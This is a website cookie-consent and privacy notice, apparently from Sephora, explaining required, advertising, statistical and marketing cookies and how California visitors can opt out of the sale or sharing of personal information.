Your privacy is important to us.
We use technologies, such as cookies, that gather information on our website. That information is used for a variety of purposes such as to understand how visitors interact with our websites, or to serve advertisements on our websites or on other websites. The use of technologies, such as cookies, constitutes a “sale” of personal information under the California Consumer Privacy Act. You can stop the use of certain third party tracking technologies that are not considered our service providers by clicking on the “Do Not Sell or Share My Personal Information” link at the bottom of our website and selecting your preferences below, or broadcasting the global privacy control signal. Note that due to technological limitations, if you visit our website from a different computer or device, or clear cookies on your browser that store your preferences, you will need to return to this screen to select your preferences and/or rebroadcast the signal. You can find a description of the types of tracking technologies, and your options with respect to those technologies, below.
Required cookies keep our site working. These cookies are necessary for our website to function. For example, required cookies are used when saving your settings and preferences, when you log in and out of your account, and for other basic site functions. These cookies cannot be disabled.
The technical storage or access is necessary for the legitimate purpose of storing preferences that are not requested by the subscriber or user.
Advertising cookies are used to provide you with a personalized experience. These cookies may be set by our advertising partners to build a profile of your interests. If you do not allow these cookies to be used, either by your browser settings or if you select "No (Opt-Out)" in the toggle above, you will experience less targeted advertising from our partners. Note that if you select “do not allow advertising cookies” we may still use third party tracking technology from companies that have contractually agreed to limit their use, storage, and disclosure of collected information to serving Sephora-specific advertisements.
The technical storage or access that is used exclusively for anonymous statistical purposes. Without a subpoena, voluntary compliance on the part of your Internet Service Provider, or additional records from a third party, information stored or retrieved for this purpose alone cannot usually be used to identify you.
The technical storage or access is required to create user profiles to send advertising, or to track the user on a website or across several websites for similar marketing purposes.